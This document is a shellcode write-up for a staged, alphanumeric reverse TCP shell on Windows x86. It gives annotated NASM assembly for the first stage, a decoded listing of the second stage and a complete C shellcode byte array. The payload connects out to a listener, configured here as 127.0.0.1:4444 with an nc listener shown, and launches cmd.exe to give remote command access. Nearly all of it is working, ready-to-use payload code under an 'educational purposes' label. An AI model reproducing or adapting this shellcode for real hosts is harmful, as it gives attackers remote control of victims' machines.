########### Windows x86 Reverse TCP Staged Alphanumeric Shellcode CreateProcessA cmd.exe ########
            ########### Author: Snir Levi, Applitects #############
				## 332 Bytes ##
			## For Educational Purposes Only ##
								
Date: 01.03.17
Author: Snir Levi
Email: snircontact@gmail.com
https://github.com/snir-levi/

IP -    127.0.0.1
PORT -  4444     

Tested on:
Windows 7
Windows 10
							###Usage###
				Victim Executes the first stage shellcode, and opens tcp connection
				After Connection is established, send the Alphanumeric stage to the connection		
						
				nc -lvp 4444
				connect to [127.0.0.1] from localhost [127.0.0.1] (port)
				RPhoceshtePrhCreaTQPXLLLLLLLLYFFFFPXNNNNj0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHPhessAhProchExitTQPXFFFFFFFFPXZZZZZZZZZZj0YIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIITXQQQQWWWQQBRQQQQQQQQQQjDTZhexeChcmd.TYPRj0ZJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJRRRBRJRRQRAAAAAAANNNNS
				
				Microsoft Windows [Version 10.0.14393]
				(c) 2016 Microsoft Corporation. All rights reserved.
				
				C:\Users\>
							###########
											
											
											
##Shellcode##
					

#### Second Stage Alphanumeric shellcode: #####

RPhoceshtePrhCreaTQPXLLLLLLLLYFFFFPXNNNNj0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHPhessAhProchExitTQPXFFFFFFFFPXZZZZZZZZZZj0YIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIITXQQQQWWWQQBRQQQQQQQQQQjDTZhexeChcmd.TYPRj0ZJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJRRRBRJRRQRAAAAAAANNNNS


R		push edx
P		push eax 
hoces 	push 0x7365636f //oces
htePr	push 0x72506574	//tePr
hCrea	push 0x61657243	//Crea
T		push esp
Q		push ecx
PX		will be replaced with call [esi] (0x16ff)
L*8		dec esp // offset esp to kernel32.dll Address
Y		pop ecx // ecx = kernel32
F*4		inc esi -> offset [esi+4]
PX		will be replaced with mov [esi],eax (0x0689)
N*4		dec esi -> offset [esi]
j0		push 0x30
X		pop eax
H*48	dec eax  // zeroing eax
P		push eax
hessA	push 0x41737365 //essA (will be null terminated)
hProc	push 0x636f7250 //Proc
hExit	push 0x74697845	//Exit
T		push esp
Q		push ecx
PX		will be replaced with call [esi] (0x16ff)
F*8		inc esi -> offset [esi+8]
PX		will be replaced with mov [esi],eax (0x0689)
Z*10	offset stack to &processinfo
j0		push 0x30
Y		pop ecx
I*48	dec ecx  // zeroing ecx
T		push esp
X		pop eax	 //eax = &PROCESS_INFORMATION
Q*4		push ecx //sub esp,16
W		push edi
W		push edi
W		push edi
Q		push ecx
Q		push ecx
B		inc edx
R		push edx
Q*10 	push ecx
jD		push 0x44
T		push esp
Z		pop edx  //edx = &STARTUPINFOA
hexeC	push 0x65
hcmd.	push 0x78652e64
T		push esp // &'cmd.exe'
Y		pop ecx
P		push eax // &PROCESS_INFORMATION
R		push edx // &STARTUPINFOA
j0		push 0x30
Z		pop edx
J*48	dec edx // zeroing edx
R*3		push edx
B		inc edx
R		push edx
J		dec edx
R*2		push edx
Q		push ecx ; &'cmd.exe'
R		push edx
A*7		inc ecx	//offset ecx to [C]exeh -> will be null terminated
N*4		dec esi //offset [esi+4] to CreateProccesA
S		push ebx ; return address
                   
             						
				
## First Stage Shellcode ##
				
				
global _start

section .text


_start:
	xor eax,eax
	push eax ; null terminator for createProcA
	
	mov eax,[fs:eax+0x30] ; Proccess Enviroment Block
	mov eax,[eax+0xc]
	mov esi,[eax+0x14]
	lodsd
	xchg esi,eax
	lodsd
	mov ebx,[eax+0x10] ; kernel32
	
	mov ecx,[ebx+0x3c] ; DOS->elf_anew
	add ecx, ebx; Skip to PE start
	mov ecx, [ecx+0x78] ; offset to export table
	add ecx,ebx ; kernel32 image_export_dir
	
	mov esi,[ecx+0x20] ; Name Table
	add esi,ebx
	
	xor edx,edx
	
	getProcAddress:
		inc edx
		lodsd
		add eax,ebx
		cmp dword [eax],'GetP'
		jne getProcAddress
		cmp dword [eax+4],'rocA'
		jne getProcAddress
	
	;---Function Adresses Chain----
	;[esi]		GetProcAddress
	;[esi+12]	WSAstartup
	;[esi+16]	WSASocketA
	;[esi+20]	connect
	;[esi+24]	recv
	;[esi+28]	kernel32
	
	;Alphanumeric stage store:
	;[esi+4]	CreateProcessA
	;[esi+8]	ExitProccess
	
	
	mov esi,[ecx+0x1c] ; Functions Addresses Chain
	add esi,ebx
	mov edx,[esi+edx*4]
	add edx,ebx ; GetProcAddress
	
	sub esp, 32 ; Buffer for the function addresses chain
	push esp
	pop esi
	mov [esp],edx ; esi offset 0 -> GetProcAddress
	mov [esi+28],ebx ;esi offset 28 -> kernel32
	
	;--------winsock2.dll Address--------------
	xor edi,edi
	push edi
	push 0x41797261 ; Ayra
	push 0x7262694c ; rbiL
	push 0x64616f4c ; daoL
	push esp
	push ebx
	
	call [esi]
	
	;-----ws2_32.dll Address-------
	xor ecx,ecx
	push ecx
	mov cx, 0x3233   ; 0023 
	push ecx
	push 0x5f327377  ; _2sw
	push esp
	
	call eax
	mov ebp,eax ;ebp = ws2_32.dll
	
	;-------WSAstartup Address-------------
	xor ecx,ecx
	push ecx
	mov cx, 0x7075      ; 00up
    push ecx
    push 0x74726174     ; trat
    push 0x53415357     ; SASW
	push esp
	push ebp
	
	call [esi]
	mov [esi+12],eax ;esi offset 12 -> WSAstartup
	
	;-------WSASocketA Address-------------
	xor ecx,ecx
	push ecx
	mov cx, 0x4174 ; 00At
	push ecx
	push 0x656b636f ; ekco
	push 0x53415357 ; SASW
	push esp
	push ebp
	
	call [esi]
	mov [esi+16],eax;esi offset 16 -> WSASocketA
	
	;------connect Address-----------
	push edi
	mov ecx, 0x74636565 ; '\0tce'
	shr ecx, 8
	push ecx
	push 0x6e6e6f63     ; 'nnoc'
	push esp
	push ebp
	
	call [esi]
	mov [esi+20],eax;esi offset 20 -> connect
	
	;------recv Address-------------
	push edi
	push 0x76636572 ;vcer
	push esp
	push ebp
	
	call [esi]
	mov [esi+24],eax;esi offset 24 -> recv
	
	;------call WSAstartup()----------
	xor ecx,ecx
	sub sp,700
	push esp
	mov cx,514
	push ecx
	call [esi+12]
		
	;--------call WSASocket()-----------
	; WSASocket(AF_INET = 2, SOCK_STREAM = 1,
	; IPPROTO_TCP = 6, NULL,
	;(unsigned int)NULL, (unsigned int)NULL);
	
	push eax ; if successful, eax = 0
	push eax
	push eax
	mov al,6
	push eax
	mov al,1
	push eax
	inc eax
	push eax
	
	call [esi+16]
	xchg eax, edi	; edi = SocketRefernce
	
	
	;--------call connect----------

	;struct sockaddr_in {
    ;   short   sin_family;
    ;   u_short sin_port;
    ;   struct  in_addr sin_addr;
    ;   char    sin_zero[8];
	;};
	

	push byte 0x1
    pop edx
    shl edx, 24
    mov dl, 0x7f    ;edx = 127.0.0.1 (hex)
	push edx
	push word 0x5c11; port 4444
	push word 0x2
	
	;int connect(
	;_In_ SOCKET                s,
	;_In_ const struct sockaddr *name,
	;_In_ int                   namelen
	;);	
	
	mov edx,esp
	push byte 16 ; sizeof(sockaddr)
	push edx ; (sockaddr*)
	push edi ; socketReference
	
	call [esi+20]
	
	
	;--------call recv()----------
	
	;int recv(
	;_In_  SOCKET s,
	;_Out_ char   *buf,
	;_In_  int    len,
	;_In_  int    flags
	;);
		
	
stage:
	push eax
	mov ax,950
	push eax	;buffer length
	push esp 
	pop ebp
	sub ebp,eax ; set buffer to [esp-950]
	push ebp	;&buf
	push edi	;socketReference
	
	call [esi+24]
	
executeStage:
	xor edx,edx
	mov byte [ebp+eax-1],0xc3	; end of the Alphanumeric buffer -> ret
	mov byte [ebp+96],dl ; null terminator to ExitProcess
	mov byte [ebp-1],0x5b ; buffer start: pop ebx -> return address
	dec ebp
	mov word [ebp+20],0x16ff ; call DWORD [esi]
	mov word [ebp+35],0x0689 ; mov [esi],eax
	mov word [ebp+110],0x16ff; call DWORD [esi]
	mov word [ebp+120],0x0689; mov [esi],eax
	mov ax,0x4173 ; As (CreateProcessA)
	mov ecx,[esi+28] ; ecx = kernel32
	dec dl ;edx = 0x000000ff
	call ebp ; Execute Alphanumeric stage
executeShell:
	mov [ecx],dl	;null terminator to 'cmd.exe'
	call dword [esi] ;createProcA 
	push eax
	call dword [esi+4] ; ExitProccess
	
	
	
	-----------------------
	
unsigned char shellcode[]=
"\x31\xc0\x50\x64\x8b\x40\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x4b\x3c\x01\xd9\x8b\x49\x78\x01\xd9\x8b\x71\x20
\x01\xde\x31\xd2\x42\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x8b\x71\x1c\x01\xde\x8b\x14
\x96\x01\xda\x83\xec\x20\x54\x5e\x89\x14\x24\x89\x5e\x1c\x31\xff\x57\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64
\x54\x53\xff\x16\x31\xc9\x51\x66\xb9\x33\x32\x51\x68\x77\x73\x32\x5f\x54\xff\xd0\x89\xc5\x31\xc9\x51\x66\xb9\x75\x70\x51\x68\x74
\x61\x72\x74\x68\x57\x53\x41\x53\x54\x55\xff\x16\x89\x46\x0c\x31\xc9\x51\x66\xb9\x74\x41\x51\x68\x6f\x63\x6b\x65\x68\x57\x53\x41
\x53\x54\x55\xff\x16\x89\x46\x10\x57\xb9\x65\x65\x63\x74\xc1\xe9\x08\x51\x68\x63\x6f\x6e\x6e\x54\x55\xff\x16\x89\x46\x14\x57\x68
\x72\x65\x63\x76\x54\x55\xff\x16\x89\x46\x18\x31\xc9\x66\x81\xec\xf4\x01\x54\x66\xb9\x02\x02\x51\xff\x56\x0c\x50\x50\x50\xb0\x06
\x50\xb0\x01\x50\x40\x50\xff\x56\x10\x97\x6a\x01\x5a\xc1\xe2\x18\xb2\x7f\x52\x66\x68\x11\x5c\x66\x6a\x02\x89\xe2\x6a\x10\x52\x57
\xff\x56\x14\x50\x66\xb8\xb6\x03\x50\x54\x5d\x29\xc5\x55\x57\xff\x56\x18\x31\xd2\xc6\x44\x05\xff\xc3\x88\x55\x60\xc6\x45\xff\x5b
\x4d\x66\xc7\x45\x14\xff\x16\x66\xc7\x45\x23\x89\x06\x66\xc7\x45\x6e\xff\x16\x66\xc7\x45\x78\x89\x06\x66\xb8\x73\x41\x8b\x4e\x1c
\xfe\xca\xff\xd5\x88\x11\xff\x16\x50\xff\x56\x04";

 
